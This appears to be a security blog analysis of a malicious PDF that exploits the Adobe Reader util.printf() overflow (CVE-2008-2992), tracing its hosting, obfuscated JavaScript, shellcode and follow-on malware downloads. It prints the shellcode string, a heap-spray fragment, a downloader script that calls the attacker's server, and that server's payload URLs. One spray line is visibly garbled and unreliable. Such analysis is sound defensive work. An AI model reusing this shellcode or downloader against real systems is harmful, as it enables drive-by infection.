On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.
Exploit Analysis:
The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.
ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75
At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.
inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to mailto:"abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered
The IP 85.17.162.100 currently maps to 19 domains.
*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net
data.pdf
84bc91579cd4dbee7faf3ee09c4a9a4b
10179
The malicious PDF file includes objects that contain document-level JavaScript.
00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj
The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.
var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">
The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).
The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.
The decoded script reveals a redirect to adxdnet.net/code/srun.php?req
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}
The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.
GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net
Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.
GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net
hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet
The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.
GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net
The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)
Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment